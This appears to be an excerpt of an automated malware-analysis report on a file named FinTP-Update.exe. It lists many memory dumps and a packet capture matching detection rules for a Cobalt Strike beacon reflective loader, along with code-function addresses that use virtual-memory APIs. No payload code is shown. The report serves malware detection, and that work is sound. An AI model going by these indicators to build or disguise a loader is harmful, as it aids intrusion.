          Source: 00000000.00000003.2720385206.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.3232473425.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2402975356.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.3210222424.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2335299936.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2146934434.0000017F36AE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2266293573.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.3187878784.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2403086446.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.3210341525.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.3299179602.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.3277090416.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2919850497.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.3321307037.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.3188050658.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.3299071408.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2897678631.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2221740996.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 00000000.00000003.2288264868.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2651458102.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2919720968.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000002.3357924421.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2674172378.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2221645510.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2425276670.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2380403205.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2357611219.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2170181010.0000017F36BBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.3276936352.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2380566087.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2266186373.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38ADA1AC NtFreeVirtualMemory,0_2_0000017F38ADA1AC
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38ADA30C NtProtectVirtualMemory,0_2_0000017F38ADA30C
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38AD9F44 NtAllocateVirtualMemory,0_2_0000017F38AD9F44
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_00007FF7193C12700_2_00007FF7193C1270
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38ADA30C0_2_0000017F38ADA30C
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38AD9F440_2_0000017F38AD9F44
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38AC77300_2_0000017F38AC7730
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38AD92480_2_0000017F38AD9248
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38AE02740_2_0000017F38AE0274
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38AD8D280_2_0000017F38AD8D28
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38AD35340_2_0000017F38AD3534
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38AE0CDC0_2_0000017F38AE0CDC
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38ADFCB80_2_0000017F38ADFCB8
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38AD95180_2_0000017F38AD9518
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38AEA6900_2_0000017F38AEA690
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38AC5DD00_2_0000017F38AC5DD0
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38AD8EF80_2_0000017F38AD8EF8
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38ADD8800_2_0000017F38ADD880
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38AEB0000_2_0000017F38AEB000
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38AD80100_2_0000017F38AD8010
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38AE39840_2_0000017F38AE3984
          Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2313200724.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2313315862.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2651300690.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2764950621.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2491328068.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2491486119.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3344304389.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2897558123.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2199556611.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2199657950.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3343869125.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2673905234.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2243779777.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2720594519.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3321457161.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3232356008.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3254690266.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2335391870.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2288382681.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2626008832.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2626162702.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2765296970.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3254891308.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2243689631.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2357499921.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2720385206.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3232473425.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2402975356.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3210222424.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2335299936.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2146934434.0000017F36AE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2266293573.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3187878784.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
